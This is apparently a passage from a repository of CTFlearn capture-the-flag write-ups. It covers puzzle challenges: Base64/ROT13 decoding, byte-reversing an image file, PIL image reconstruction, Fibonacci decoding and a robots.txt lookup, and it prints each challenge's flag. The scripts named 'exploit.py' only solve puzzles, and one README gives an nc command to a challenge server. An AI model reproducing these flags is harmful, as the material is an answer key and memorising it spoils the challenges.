24 | #### Step-5:
25 | Finally, Base64 again. It looked small, so I hoped it would be the flag.
26 | 27 | 28 | 29 | #### Step-6: 30 | Finally, the flag becomes: 31 | `flag{m3Et_me_4t_12_aM}` 32 | -------------------------------------------------------------------------------- /Miscellaneous/Ambush Mission/Reversal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Ambush Mission/Reversal.png -------------------------------------------------------------------------------- /Miscellaneous/Ambush Mission/clue.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Ambush Mission/clue.png -------------------------------------------------------------------------------- /Miscellaneous/Android, run!/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Android, run!/Flag.png -------------------------------------------------------------------------------- /Miscellaneous/Android, run!/Run.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Android, run!/Run.apk -------------------------------------------------------------------------------- /Miscellaneous/F1L3 M1X3R/Flag.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/F1L3 M1X3R/Flag.jpeg -------------------------------------------------------------------------------- /Miscellaneous/F1L3 M1X3R/Repair.png: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/F1L3 M1X3R/Repair.png
--------------------------------------------------------------------------------
/Miscellaneous/F1L3 M1X3R/Unrepair.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/F1L3 M1X3R/Unrepair.png
--------------------------------------------------------------------------------
/Miscellaneous/F1L3 M1X3R/exploit.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Reading the bytes
4 | with open("fl4g.jpeg", "rb") as file:
5 |     OFFSET = 4
6 |     sig_rev = b""
7 |     sig_read = bytearray(file.read(OFFSET))
8 |
9 |     # Cyclic Reversing: reverse each 4-byte chunk in turn until the file is exhausted
10 |     while sig_read:
11 |         sig_rev += sig_read[::-1]
12 |         sig_read = file.read(OFFSET)
13 | # Flag Output
14 | with open("Flag.jpeg", "wb") as newfile:
15 |     newfile.write(sig_rev)
--------------------------------------------------------------------------------
/Miscellaneous/F1L3 M1X3R/fl4g.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/F1L3 M1X3R/fl4g.jpeg
--------------------------------------------------------------------------------
/Miscellaneous/Get Into Command Mission/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Get Into Command Mission/Flag.png
--------------------------------------------------------------------------------
/Miscellaneous/Get Into Command Mission/program.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Get Into Command Mission/program.exe
--------------------------------------------------------------------------------
/Miscellaneous/Help Bity/README.md:
--------------------------------------------------------------------------------
## Help Bity
The main idea is to try to figure out what encryption is used on the flag.

#### Step-1:
I thought it was ROT47. It was not ROT47.

#### Step-2:
I used [CyberChef](https://gchq.github.io/CyberChef/)'s Magic option. [Here](https://gchq.github.io/CyberChef/#recipe=Magic(3,true,false,'CTF')&input=QlVHTWRgc296YzBvYHN4XjByXmB2ZHIxbGR8) is the full flag solve link.

#### Step-3:
Finally, the flag becomes: `CTFLearn{b1nary_1s_awes0me}`

--------------------------------------------------------------------------------
/Miscellaneous/Practice Flag/README.md:
--------------------------------------------------------------------------------
## Practice Flag
The main idea of finding the flag is to have eyes.

#### Step-1:

The flag is already given to you. Just paste it.

#### Step-2:
Finally, the flag becomes:
`flag{CTFLearn_is_awesome}`

--------------------------------------------------------------------------------
/Miscellaneous/QR Code v2/Flag.txt:
--------------------------------------------------------------------------------
CTF{2_QR_4_U}
--------------------------------------------------------------------------------
/Miscellaneous/QR Code v2/README.md:
--------------------------------------------------------------------------------
## QR Code v2
The main idea of finding the flag is common sense.

#### Step-1:
After downloading `qr_code.jpg` from the cloud, I tried to scan it online.

#### Step-2:
I followed the URL: https://webqr.com/

I got the following result:

We get another link from here:

[https://mega.nz/#!9NFhUbwQ!vtrLVum8z-ZXzur33RrGJ4uivMJhA9_5TW2ulHucXoU](https://mega.nz/#!9NFhUbwQ!vtrLVum8z-ZXzur33RrGJ4uivMJhA9_5TW2ulHucXoU)

#### Step-3:
So I went to the above URL and downloaded `Flag.txt`.

It had the flag in it. That's it.

#### Step-4:
Finally, the flag becomes:
`CTF{2_QR_4_U}`
--------------------------------------------------------------------------------
/Miscellaneous/QR Code v2/Scan.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/QR Code v2/Scan.png
--------------------------------------------------------------------------------
/Miscellaneous/QR Code v2/qr_code.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/QR Code v2/qr_code.jpg
--------------------------------------------------------------------------------
/Miscellaneous/QR Code/Base64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/QR Code/Base64.png
--------------------------------------------------------------------------------
/Miscellaneous/QR Code/README.md:
--------------------------------------------------------------------------------
## QR Code
The main idea of finding the flag is to decrypt multiple encryptions.

#### Step-1:
After downloading `qrcode.39907201.png` from the cloud, my first try was to scan it online:

#### Step-2:
I followed the URL: https://webqr.com/index.html

I got the following message after the scan:

Message: `c3ludCB2ZiA6IGEwX29icWxfczBldHJnX2RlX3BicXI=`.

This was clearly Base64-encoded, as the terminating '=' shows.

#### Step-3:
So, I tried to decode the flag at this URL: https://www.base64decode.org/

I got the following result:

Decryption: `synt vf : a0_obql_s0etrg_de_pbqrgo`.

I tried this as the flag, but unfortunately, it didn't work out. I then thought that this message itself could be encrypted, and I got a sense of ROT13 there. If anyone is unaware of ROT13 encryption, they can check it out here: https://en.wikipedia.org/wiki/ROT13

#### Step-5:
So for ROT13 decryption, I followed this URL: https://cryptii.com/.

I got the following result:

Voila, we have it.
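The Base64-then-ROT13 chain from the steps above, together with the single-transform guess that CyberChef's Magic made for Help Bity, as an added example that is not part of the original writeup. The function names and the crib words (`flag`, `ctf`) are this example's own assumptions; the two inputs are taken from the page.

```python
import base64
import binascii
import codecs
import string

# Bytes accepted as readable text: printable ASCII minus vertical tab and form feed.
PRINTABLE = set(string.printable.encode()) - {0x0B, 0x0C}

# Inputs taken from the page: the scanned QR message, and the Help Bity
# ciphertext as carried (Base64-wrapped) in the CyberChef link's input= value.
QR_MESSAGE = b"c3ludCB2ZiA6IGEwX29icWxfczBldHJnX2RlX3BicXI="
HELP_BITY = base64.b64decode("QlVHTWRgc296YzBvYHN4XjByXmB2ZHIxbGR8")


def is_text(data):
    return bool(data) and all(b in PRINTABLE for b in data)


def has_crib(data, cribs):
    lowered = data.lower()
    return any(crib in lowered for crib in cribs)


def try_base64(data):
    """Strict Base64: reject a bad alphabet, bad padding, or a non-text result."""
    try:
        decoded = base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None
    return decoded if is_text(decoded) else None


def rot13(data):
    return codecs.encode(data.decode("ascii"), "rot_13").encode("ascii")


def xor_hit(data, cribs):
    """Try every single-byte XOR key; accept only readable output with a crib."""
    for key in range(1, 256):
        candidate = bytes(b ^ key for b in data)
        if is_text(candidate) and has_crib(candidate, cribs):
            return "xor(0x%02x)" % key, candidate
    return None


def peel(data, cribs=(b"flag", b"ctf"), max_depth=3):
    """Breadth-first search over decoder chains.

    Returns (chain, plaintext) for the shortest chain whose output contains a
    crib, or None. Base64 and ROT13 outputs are kept as intermediate layers;
    XOR is only tried as the last layer to keep the search small.
    """
    if has_crib(data, cribs):
        return [], data
    frontier = [([], data)]
    for _ in range(max_depth):
        next_frontier = []
        for chain, blob in frontier:
            layers = []
            decoded = try_base64(blob)
            if decoded is not None:
                layers.append(("base64", decoded))
            # ROT13 twice is the identity, so never apply it back to back.
            if is_text(blob) and chain[-1:] != ["rot13"]:
                layers.append(("rot13", rot13(blob)))
            for name, out in layers:
                if has_crib(out, cribs):
                    return chain + [name], out
                next_frontier.append((chain + [name], out))
            hit = xor_hit(blob, cribs)
            if hit is not None:
                return chain + [hit[0]], hit[1]
        frontier = next_frontier
    return None


if __name__ == "__main__":
    for label, blob in (("QR Code", QR_MESSAGE), ("Help Bity", HELP_BITY)):
        print(label, peel(blob))
```

Neither layer needs a key or any secret, which is why a crib search recovers both flags offline.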
#### Step-6:

Finally, the flag becomes:
`n0_body_f0rget_qr_code`
--------------------------------------------------------------------------------
/Miscellaneous/QR Code/ROT13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/QR Code/ROT13.png
--------------------------------------------------------------------------------
/Miscellaneous/QR Code/Scan.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/QR Code/Scan.png
--------------------------------------------------------------------------------
/Miscellaneous/QR Code/qrcode.39907201.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/QR Code/qrcode.39907201.png
--------------------------------------------------------------------------------
/Miscellaneous/Reversal of fortune/README.md:
--------------------------------------------------------------------------------
## Reversal of fortune
The main idea of finding the flag is to be conscious. That's it.

#### Step-1:
We read the given message:

`.nac uoy fi tIe$reveRpilF eldnah ym gnisu em egassem ,avaj yllacificeps ,gnidoc emos htiw pleh deen I ,deifitnedi tegrat txeN`

#### Step-2:
This is a simple reversed string.

So reading it correctly, we get:

`Next target identified, I need help with some coding, specifically java, message me using my handle FlipRever$eIt if you can.`

So I tried `FlipRever$eIt` as the flag, and voila, it works.

#### Step-3:
Finally, the flag becomes:
`CTFlearn{FlipRever$eIt}`

--------------------------------------------------------------------------------
/Miscellaneous/Rock Paper Scissors/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Rock Paper Scissors/Flag.png
--------------------------------------------------------------------------------
/Miscellaneous/Rock Paper Scissors/README.md:
--------------------------------------------------------------------------------
## Rock Paper Scissors
The main idea of finding the flag is recognizing a pattern to pwn.

#### Step-1:
After I input `nc 138.197.193.132 5001`, I tried various combinations to complete the challenge.

#### Step-2:
It is easy to find a pattern because the pwn machine chooses a specific 'R' or 'P' or 'S' corresponding to a number. So, after matching the numbers with the machine's choice, I got this pattern to get 10 consecutive wins.

```
PRPSPPSPRP
```

#### Step-3:
Finally, the flag becomes:
`CTFlearn{r0ck_p4per_skiss0rs}`
--------------------------------------------------------------------------------
/Miscellaneous/Time Traveller/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Time Traveller/Flag.png
--------------------------------------------------------------------------------
/Miscellaneous/Time Traveller/README.md:
--------------------------------------------------------------------------------
## Time Traveller
The main idea of finding the flag is using Web Archive.

#### Step-1:
Let's take a trip to nasa.gov on December 31, 1996.
If you can tell me what email NASA listed on their website, I'll provide you with 10 points.

From the description, it's clear that we have to access the [Web Archive](http://web.archive.org/) here.

#### Step-2:
So, I visited the given date: December 31, 1996 for [nasa.gov](nasa.gov) website. It was accessible here: http://web.archive.org/web/19961231235847/http://www.nasa.gov/

#### Step-3:
Clearly, we can see the flag there.

#### Step-4:
Finally, the flag becomes:
`today@nasa.gov`
--------------------------------------------------------------------------------
/Miscellaneous/Time Traveller/Web1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Time Traveller/Web1.png
--------------------------------------------------------------------------------
/Miscellaneous/Time Traveller/Web2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Time Traveller/Web2.png
--------------------------------------------------------------------------------
/Miscellaneous/What could this be?/Input.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/What could this be?/Input.png
--------------------------------------------------------------------------------
/Miscellaneous/What could this be?/Output.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/What could this be?/Output.png
--------------------------------------------------------------------------------
/Miscellaneous/Where Can My Robot Go?/README.md:
--------------------------------------------------------------------------------
## Where Can My Robot Go?
The main idea of finding the flag is using simple logic and some un-accessed web pages.

#### Step-1:
After we read the question, there is literally no hint to go anywhere. So I tried
`https://ctflearn.com/robots.txt` to get some hint.

#### Step-2:
It showed me the following output:

```bash
User-agent: *
Disallow: /70r3hnanldfspufdsoifnlds.html
```

#### Step-3:
So I went to that web page at:
`https://ctflearn.com/70r3hnanldfspufdsoifnlds.html`

I got the flag there.

#### Step-4:

Finally, the flag becomes:
`CTFlearn{r0b0ts_4r3_th3_futur3}`

--------------------------------------------------------------------------------
/Miscellaneous/Wikipedia/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Wikipedia/1.png
--------------------------------------------------------------------------------
/Miscellaneous/Wikipedia/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Wikipedia/2.png
--------------------------------------------------------------------------------
/Miscellaneous/Wikipedia/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Wikipedia/3.png
--------------------------------------------------------------------------------
/Miscellaneous/Wikipedia/README.md:
--------------------------------------------------------------------------------
## Wikipedia
The main idea of finding the flag is to explore more from the question.

#### Step-1:
First of all, I tried directly searching for the given IP Address, but that path led nowhere. So next, I went to https://www.wikipedia.org/ to get answers. I tried searching their database for the given IP Address.

#### Step-2:
Upon searching the given domain, I got this search result, so I checked some of the links there.

#### Step-3:

When I tried the first link, https://en.wikipedia.org/w/index.php?title=Flag&diff=prev&oldid=676540540,
I got the flag there:

#### Step-4:
Finally, the flag becomes:
`CTFlearn{cNi76bV2IVERlh97hP}`

--------------------------------------------------------------------------------
/Programming/An Old Image/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/An Old Image/Flag.png
--------------------------------------------------------------------------------
/Programming/An Old Image/README.md:
--------------------------------------------------------------------------------
## An Old Image
The main idea of finding the flag is using the PIL image-processing library.

#### Step-1:
We are given `old_image.png` which is as follows:

#### Step-2:
The given image has the columns mixed. So, we basically iterate through the columns to replace all the contrasting pixels back to `255, 255, 255`. The script `exploit.py` can be used to proceed.

```py
#!/bin/python3
from PIL import Image

old_img = Image.open('old_image.png')
oldPixelLoad = old_img.load()

img = Image.new(mode = "RGB", size = (old_img.width, old_img.height), color = (255, 255, 255))
pixelLoad = img.load()

for x in range(old_img.width):
    for y in range(old_img.height):
        a = x
        b = y
        c = oldPixelLoad[x, y][0]
        d = oldPixelLoad[x, y][1]

        if a + b > 255:
            pixelLoad[c, d] = (255, 255, 255)
        else:
            pixelLoad[c, d] = (0, 0, 0)

img.save("new_image.png")
img.show()
```

#### Step-3:
After executing the above script, we get a new image called `new_image.png` which is as follows:

#### Step-4:
The image is then scanned using an online tool called [Aspose](https://products.aspose.app/barcode/recognize) which decodes the QR code and gives out the flag.

#### Step-5:
Finally the flag becomes:
`CTFlearn{how_can_swapping_columns_hide_a_qr_code}`
--------------------------------------------------------------------------------
/Programming/An Old Image/exploit.py:
--------------------------------------------------------------------------------
#!/bin/python3
from PIL import Image

old_img = Image.open('old_image.png')
oldPixelLoad = old_img.load()

img = Image.new(mode = "RGB", size = (old_img.width, old_img.height), color = (255, 255, 255))
pixelLoad = img.load()

for x in range(old_img.width):
    for y in range(old_img.height):
        a = x
        b = y
        c = oldPixelLoad[x, y][0]
        d = oldPixelLoad[x, y][1]

        if a + b > 255:
            pixelLoad[c, d] = (255, 255, 255)
        else:
            pixelLoad[c, d] = (0, 0, 0)

img.save("new_image.png")
img.show()
--------------------------------------------------------------------------------
/Programming/An Old Image/new_image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/An Old Image/new_image.png
--------------------------------------------------------------------------------
/Programming/An Old Image/old_image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/An Old Image/old_image.png
--------------------------------------------------------------------------------
/Programming/AndhraPradesh Assembler Chall/AndhraPradesh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/AndhraPradesh Assembler Chall/AndhraPradesh
--------------------------------------------------------------------------------
/Programming/AndhraPradesh Assembler Chall/AndhraPradesh.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/AndhraPradesh Assembler Chall/AndhraPradesh.o
--------------------------------------------------------------------------------
/Programming/AndhraPradesh Assembler Chall/AndhraPradesh.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/AndhraPradesh Assembler Chall/AndhraPradesh.zip
--------------------------------------------------------------------------------
/Programming/AndhraPradesh Assembler Chall/clnasm.sh:
--------------------------------------------------------------------------------
#!/bin/bash

set -x

# rm AndhraPradesh

nasm -f elf64 -F dwarf -o AndhraPradesh.o AndhraPradesh.asm

ld AndhraPradesh.o -o AndhraPradesh

set +x

chmod +x AndhraPradesh
./AndhraPradesh
echo $?

--------------------------------------------------------------------------------
/Programming/Dawn's Lawn/Flag.py:
--------------------------------------------------------------------------------
import numpy as np
import sys

with open(sys.argv[1]) as f:

    lines = f.read().split('\n')
    dim = len(lines[0])

conv = {'.': 0,'_': 1,'\\': 2, '-': 3, '/': 4, '|': 5, '*': 6}
matrix = np.array([[conv[y] for y in x] for x in lines])
matrix -= 2 # Mow everything
grow = np.tile(np.arange(dim-1, -1, -1), (dim, 1))
grow[matrix <= 0] = 0 # Don't grow on infertile land
matrix += grow
print("Flag: " + str((matrix >= 6).sum()))

--------------------------------------------------------------------------------
/Programming/Dawn's Lawn/dawn2.txt:
--------------------------------------------------------------------------------
\|*/|_|.-_\\|.|_.-//
/-\_.--.|-_._\.-|/*-
\\-|..-*-/__*--/.\*-
_/\|.*.---___***_/\.
_-|.\\././_/|.-|_\//
_-*.\..**/|/**.\_./-
|-*|*.-_-////.|**-|-
*\|*_-|_\-|__\_.*.-|
.*///*.*/*\_-\..*-**
*/_\-\.//--/||\\/_|_
*.**/--/**///./\\/-|
/|.\-..*-./\..-|\.||
|\/\__|./*_-\|-/_*_\
.|///*-/\-/|*/*||*-*
.\.|\/.*/--*.|\--\/\
/_/|_|_---\_\_.***.-
|-.._.-*\|*_\/_|_\/*
.\.|\|//_-|.*-*|\*|*
_\/-|-_*\-\|-/-/-*.-
-_..\_\_*\\-*__..*/-
--------------------------------------------------------------------------------
/Programming/Fabio's Nachos/Base64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Fabio's Nachos/Base64.png
--------------------------------------------------------------------------------
/Programming/Fabio's Nachos/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Fabio's Nachos/Flag.png
--------------------------------------------------------------------------------
/Programming/Fabio's Nachos/base.txt:
--------------------------------------------------------------------------------
OTI3MzcyNjkyMTkzMDc4OTk5MTc2IDE2NjQxMDI3NzUwNjIwNTYzNjYyMDk2IDgzNjIxMTQzNDg5ODQ4NDIyOTc3IDE1MDA1MjA1MzYyMDY4OTYwODMyNzcgMjI2OTgzNzQwNTIwMDY4NjM5NTY5NzU2ODIgOTI3MzcyNjkyMTkzMDc4OTk5MTc2IDc3Nzg3NDIwNDkgMTM1MzAxODUyMzQ0NzA2NzQ2MDQ5IDQ4MDc1MjY5NzYgNDM1NjY3NzYyNTg4NTQ4NDQ3MzgxMDUgMzI5NTEyODAwOTkgMjE4OTIyOTk1ODM0NTU1MTY5MDI2IDI0Mjc4OTMyMjgzOTk5NzUwODI0NTMgNDgwNzUyNjk3NiA1OTQyNTExNDc1NzUxMjY0MzIxMjg3NTEyNQ==

--------------------------------------------------------------------------------
/Programming/Fabio's Nachos/exploit.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
import base64
from Cryptodome.Util import number

def find_fibonacci_index(values):
    ma = max(values)

    w = [0] * 100
    w[0] = 1
    w[1] = 1
    i = 2
    n = 0
    seq = [-1] * len(values)
    while n < ma:
        n = w[(i-1)%100] + w[(i-2)%100]
        w[i % 100] = n
        try:
            loc = -1
            while True:
                loc = values.index(n, loc+1, len(values))
                seq[loc] = i+1
        except ValueError:
            pass
        finally:
            i += 1
    return seq

buffer = open('base.txt', 'rb').read()
values = base64.b64decode(buffer).split()
values = list(map(int, values))
sequence = find_fibonacci_index(values)
# print(sequence)
print(''.join(map(chr, sequence)))

--------------------------------------------------------------------------------
/Programming/Image Magic/ALTERNATE.md:
--------------------------------------------------------------------------------
# Image Magic
The main idea is finding the flag by doing image processing with Python libraries like numpy and pillow.

#### Step-1:
We download the image and see the image is a giant line that's a single pixel tall:
![out copy](./out%20copy.jpg)

#### Step-2:
The first part of [`script.py`](./script.py) just counts how many pixels wide the image is. It outputs 27968 which will be useful later.
```python
import numpy
from PIL import Image

img = numpy.array(Image.open("out copy.jpg"))
print(len(img[0]))
```

#### Step-3:
```python
new = []
line = []
for i in range(len(img[0])):
    line.append(img[0][i])
    if i%92 == 91:
        new.append(line)
        line = []
```
This part of the script is supposed to reconstruct the image if it has a height of 304 as stated in [this comment](https://ctflearn.com/challenge/89/3000#comment-3000)

#### Step-4:
The final part of the script saves the flag in a new image.
```python
new = numpy.array(new)
Image.fromarray(new).save("flag.png")
```
![flag](./flag.png)

#### Step-5:
Finally, the flag becomes:
`flag{cool_right?}`
--------------------------------------------------------------------------------
/Programming/Image Magic/Exploit.py:
--------------------------------------------------------------------------------
from PIL import Image

# Specs from old pic
im = Image.open('out copy.jpg')
pix_val = list(im.getdata())
splited = [pix_val[i::92] for i in range(92)]

# Defining new pic
h, w = 92, 304
new_im = Image.new("RGB",(w, h))
pix = new_im.load()

# Setting height and pixels
for y in range(h):
    line = splited[y]
    for x in range(w):
        r, g, b = line[x]
        pix[x, y] = (r, g, b)

# New Image
new_im.save("Flag.jpg", "JPEG")

--------------------------------------------------------------------------------
/Programming/Image Magic/Flag.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Image Magic/Flag.jpg
--------------------------------------------------------------------------------
/Programming/Image Magic/README.md:
--------------------------------------------------------------------------------
## Image Magic
The main idea of finding the flag is to use PIL from Python.

#### Step-1:
After I downloaded `out copy.jpg`, it is clearly stretched. All we need to do is to set the pixels and realign them.

#### Step-2:

So, I wrote `Exploit.py` with the help of PIL to get our flag.

```python
from PIL import Image

# Specs from old pic
im = Image.open('out copy.jpg')
pix_val = list(im.getdata())
splited = [pix_val[i::92] for i in range(92)]

# Defining new pic
h, w = 92, 304
new_im = Image.new("RGB",(w, h))
pix = new_im.load()

# Setting height and pixels
for y in range(h):
    line = splited[y]
    for x in range(w):
        r, g, b = line[x]
        pix[x, y] = (r, g, b)

# New Image
new_im.save("Flag.jpg", "JPEG")
```

#### Step-3:
After running this as `python3 Exploit.py`, I got the flag.

#### Step-4:
Finally the flag becomes:
`flag{cool_right?}`
--------------------------------------------------------------------------------
/Programming/Image Magic/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Image Magic/flag.png
--------------------------------------------------------------------------------
/Programming/Image Magic/out copy.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Image Magic/out copy.jpg
--------------------------------------------------------------------------------
/Programming/Image Magic/script.py:
--------------------------------------------------------------------------------
import numpy
from PIL import Image
import matplotlib

img = numpy.array(Image.open("out copy.jpg"))
print(len(img[0]))
new = []
line = []
for i in range(len(img[0])):
    line.append(img[0][i])
    if i%92 == 91:
        new.append(line)
        line = []
new = numpy.array(new)
Image.fromarray(new).save("flag.png")
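Going one step beyond the two Image Magic writeups, which take the 92 by 304 shape from a challenge comment: an added example (not code from the repository) that factors the strip length into candidate shapes, ranks them, and rebuilds the picture with both the stride and the chunk approach. It assumes grayscale integer pixels and that neighbouring columns of the original picture look alike, which makes the ranking a heuristic; all function names and the sample strip are constructed here.

```python
def candidate_shapes(n, min_side=2):
    """All (height, width) pairs with height * width == n and both sides >= min_side."""
    return [(h, n // h) for h in range(min_side, n // min_side + 1) if n % h == 0]


def column_mismatch(strip, height):
    """Mean absolute difference between each pixel and the one `height` places
    later, i.e. its right-hand neighbour if the strip stores columns of that height."""
    pairs = len(strip) - height
    return sum(abs(strip[i + height] - strip[i]) for i in range(pairs)) / pairs


def guess_shape(strip, min_side=2):
    """Pick the candidate shape whose adjacent columns differ the least."""
    shapes = candidate_shapes(len(strip), min_side)
    if not shapes:
        raise ValueError("strip length has no factor pair with both sides >= min_side")
    return min(shapes, key=lambda shape: column_mismatch(strip, shape[0]))


def unflatten_by_stride(strip, height):
    """Row y is every height-th pixel starting at y (Exploit.py's pix_val[i::92])."""
    return [strip[y::height] for y in range(height)]


def unflatten_by_chunks(strip, height):
    """Consecutive chunks of `height` pixels (script.py's i % 92 == 91 split).
    Each chunk is one column, so the result is the transposed picture."""
    return [strip[k:k + height] for k in range(0, len(strip), height)]


# Constructed sample: a 4-row by 6-column picture with a strong top-to-bottom
# gradient, flattened column by column into one 24-pixel strip.
SAMPLE_HEIGHT, SAMPLE_WIDTH = 4, 6
SAMPLE_STRIP = [50 * y + 3 * x for x in range(SAMPLE_WIDTH) for y in range(SAMPLE_HEIGHT)]


if __name__ == "__main__":
    height, width = guess_shape(SAMPLE_STRIP)
    print("recovered shape:", height, "x", width)
    for row in unflatten_by_stride(SAMPLE_STRIP, height):
        print(row)
    # The strip length reported in the writeup factors into the shape it uses.
    print((92, 304) in candidate_shapes(27968, min_side=16))
```

On a real strip, raise `min_side` so that very small heights, whose pixels are vertical neighbours in the true picture, do not win the ranking.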
--------------------------------------------------------------------------------
/Programming/Is it the Flag? (JAVA)/IsItTheFlag.java:
--------------------------------------------------------------------------------
public class IsItTheFlag {

    public static boolean isFlag(String str) {
        return str.hashCode() == 1471587914 && str.toLowerCase().hashCode() == 1472541258;
    }

    public static void main(String[] args) {

        String flag = "------";

        if (isFlag(flag))
            System.out.println("You found it!");
        else
            System.out.println("Try again :(");

    }
}
--------------------------------------------------------------------------------
/Programming/Old memories/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Old memories/1.png
--------------------------------------------------------------------------------
/Programming/Old memories/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Old memories/2.png
--------------------------------------------------------------------------------
/Programming/Old memories/README.md:
--------------------------------------------------------------------------------
## Old memories

#### Step-1:
